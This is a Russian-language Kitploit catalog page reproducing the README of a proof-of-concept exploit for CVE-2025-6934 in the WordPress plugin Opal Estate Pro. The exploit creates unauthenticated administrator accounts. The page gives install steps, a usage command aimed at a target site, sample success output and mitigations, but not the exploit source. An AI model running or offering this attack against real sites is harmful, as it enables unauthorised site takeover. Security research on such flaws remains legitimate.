Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6934 — Эксплойт для проверки концепции для CVE-2025-6934, критической уязвимости плагина WordPress Opal Estate Pro, позволяющей создать учётную запись администратора без аутентификации. Включает автоматическое определение версии, извлечение nonce и эксплуатацию AJAX-эндпоинта. | Kitploit
Инструменты/GitHubGitHub/yukinime/cve-2025-6934
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubyukinime/cve-2025-6934

CVE-2025-6934

Эксплойт для проверки концепции для CVE-2025-6934, критической уязвимости плагина WordPress Opal Estate Pro, позволяющей создать учётную запись администратора без аутентификации. Включает автоматическое определение версии, извлечение nonce и эксплуатацию AJAX-эндпоинта.

Репозиторий
5311 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-6934 – Эксплуатация WordPress Opal Estate Pro

Логотип WordPress

📖 Описание
Этот репозиторий содержит эксплойт Proof of Concept (PoC) для CVE-2025-6934,
критической уязвимости в плагине WordPress: Opal Estate Pro <= 1.7.5, которая позволяет создавать учетные записи администратора без аутентификации.

⚠️ Отказ от ответственности: Данный инструмент предоставляется только в образовательных целях и для исследований в области безопасности.
Автор не несет ответственности за любое неправомерное использование или причиненный ущерб.


🚀 Возможности

  • Автоматическое определение версии плагина из readme.txt
  • Извлечение nonce для регистрации
  • Эксплуатация уязвимой AJAX-конечной точки
  • Создание новой учетной записи администратора

🔧 Установка

Клонируйте репозиторий и установите зависимости:

root@kitploit:~
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934

pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests
beautifulsoup4
colorama

▶️ Использование

Запустите скрипт с указанием цели:

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin

✅ Пример вывода:

root@kitploit:~
[✔] Eksploitasi Berhasil!
    Username : newadmin
    Email    : [email protected]
    Password : MySecurePass123
    Role     : administrator

📸 Скриншот

Скриншот эксплойта


🛡️ Меры защиты

  • Обновите плагин до последней версии
  • Или немедленно отключите уязвимый плагин
  • Отслеживайте журналы WordPress на предмет несанкционированного создания учетных записей

👤 Автор

Cyberlone Indonesia (Cyberlone)


📜 Лицензия

Этот проект лицензирован на условиях лицензии MIT – см. LICENSE для получения подробной информации.

Скачать инструмент